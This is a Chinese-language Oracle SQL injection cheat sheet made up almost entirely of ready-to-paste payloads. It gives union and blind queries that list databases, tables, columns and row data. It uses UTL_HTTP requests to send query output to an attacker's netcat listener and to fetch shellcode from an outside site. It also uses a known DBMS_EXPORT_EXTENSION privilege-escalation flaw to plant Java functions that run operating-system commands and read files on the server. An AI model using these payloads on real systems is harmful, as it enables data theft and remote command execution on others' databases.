注释符: --
不支持多句执行,但支持联合查询。
数据库名、表名、列名在数据字典中均以大写存储,比较时须全部大写。
length(字段)
ascii(substr(字段,N,1))
and (select count(*) from dual)>0-- 判断是否为oracle
order by n--
and 1=2 union select null,null,.....,null from dual-- 用N或者'N'代替null
and 1=2 union select null,(sql语句),.....,null from dual-- 在'N'处改成(sql语句)
and (select count(*) from all_objects where object_name='UTL_HTTP')>0-- 判断是否支持UTL_HTTP(可知出口IP)
and UTL_HTTP.request('http://LocalIP:port'||(SQL语句))=1-- 远程发信息到本地、本地监听nc -vv -l -p 1234
SQL语句
select banner from sys.v_$version where rownum=1 查询oracle版本
select member from v$logfile where rownum=1 查询日志文件路径(可知windows或linux)
select utl_inaddr.get_host_address from dual 查询数据库监听IP
select instance_name from v$instance 查询sid
select name from v$database 查询当前数据库名
select sys_context ('userenv','current_user') from dual 查询数据库用户
select * from session_roles where rownum=1 查询当前用户的第一个角色(session_roles 列出的是角色而非具体权限)
select * from session_roles where rownum=1 [and role<>'第一个权限名']
select table_name from user_tables where rownum=1 当前数据库第一个表段
select table_name||','||tablespace_name from user_tables where rownum=1 第一个表段及其表空间名(作验证;表空间名不一定等于v$database中的数据库名)
select table_name from user_tables where rownum=1 and table_name<>'第一个表段' 当前数据库第二个表段
select column_name from user_tab_columns where rownum=1 and table_name='表段' 表名对应的第一个字段
select column_name from user_tab_columns where rownum=1 and table_name='表段' and column_name<>'第一个字段' 表名对应的第二个字段
select 字段 from 表段 where rownum=1 暴第一行内容
select 字段 from 表段 where rownum=1 and 字段<>'第一行内容' 暴第二行内容
跨库(即查询其他 owner/schema 下的对象)
select owner from all_tables where rownum=1 查询第一个数据库名
select owner from all_tables where rownum=1 and owner<>'第一个数据库名' 查询第二个数据库名
select table_name from all_tables where rownum=1 and owner='数据库名' 查询对应数据库的第一个表名
select table_name from all_tables where rownum=1 and owner='数据库名' and table_name<>'第一个表名' 查询对应数据库的第二个表名
select column_name from all_tab_columns where rownum=1 and owner='数据库名' and table_name='表段' 表名对应的第一个字段
select column_name from all_tab_columns where rownum=1 and owner='数据库名' and table_name='表段' and column_name<>'第一个字段' 表名对应的第二个字段
select 字段 from 数据库.表段 where rownum=1 暴第一行内容
select 字段 from 数据库.表段 where rownum=1 and 字段<>'第一行内容' 暴第二行内容
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);多语句END;--','SYS',0,'1',0)--
如果'被转义,需要用chr()。
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||多语句||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0)=0--
如果多语句过长,可以把语句写到网站文件,然后用utl_http.request来取。
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);utl_http.request('http://www.guetsec.com/shellcode.txt');--','SYS',0,'1',0)--
创建 Java 类 SecTest(以下各步均依赖 SYS.DBMS_EXPORT_EXTENSION 的已知提权缺陷,Oracle 已在 2006 年的关键补丁更新中修复;已打补丁的实例会在此步失败)
runCMD用于执行系统命令
and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE''''create or replace and compile java source named "SecTest" as import java.io.*; public class SecTest extends Object{public static String runCMD(String args){try{BufferedReader myReader=new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream())); String stemp,str="";while((stemp=myReader.readLine())!=null) str+=stemp+"\n";myReader.close();return str;}catch(Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual)--
readFile用于读取文件
and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE''''create or replace and compile java source named "SecTest" as import java.io.*; public class SecTest extends Object{public static String readFile(String filename){try{BufferedReader myReader=new BufferedReader(new FileReader(filename));String stemp,str="";while((stemp=myReader.readLine())!=null) str+=stemp+"\n";myReader.close();return str;}catch(Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual)--
赋Java权限
and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(''''''''PUBLIC'''''''',''''''''SYS:java.io.FilePermission'''''''',''''''''<<ALL FILES>>'''''''',''''''''execute'''''''');end;'''';END;'';END;--','SYS',0,'1',0) from dual)--
创建函数
SecRunCMD函数
and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function SecRunCMD(p_cmd in varchar2) return varchar2 as language java name''''''''SecTest.runCMD(java.lang.String) return String'''''''';'''';END;'';END;--','SYS',0,'1',0) from dual)--
SecReadFile函数
and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function SecReadFile(filename in varchar2) return varchar2 as language java name''''''''SecTest.readFile(java.lang.String) return String'''''''';'''';END;'';END;--','SYS',0,'1',0) from dual)--
赋public执行函数的权限
SecRunCMD赋权限
and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on SecRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual)--
SecReadFile赋权限
and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on SecReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual)--
检测函数是否创建成功
and (select count(*) from all_objects where object_name='SECRUNCMD')>0--
and (select count(*) from all_objects where object_name='SECREADFILE')>0--
执行命令
and '1'<>(select sys.SecRunCMD('执行命令') from dual)--
and '1'<>(select sys.SecReadFile('文件物理地址') from dual)--
或者
and 1=2 union select null,...,sys.SecRunCMD('执行命令'),...,null from dual--
and 1=2 union select null,...,sys.SecReadFile('文件物理地址'),...,null from dual--
或者
and '1'<>(select UTL_HTTP.request('http://LocalIP:port'||REPLACE(REPLACE(sys.SecRunCMD('执行命令'),' ',' '),'\n',' ')) from dual)--
and '1'<>(select UTL_HTTP.request('http://LocalIP:port'||REPLACE(REPLACE(sys.SecReadFile('文件物理地址'),' ',' '),'\n',' ')) from dual)--
删除函数
and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''drop function SecRunCMD'''';END;'';END;--','SYS',0,'1',0) from dual)--
and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''drop function SecReadFile'''';END;'';END;--','SYS',0,'1',0) from dual)-- |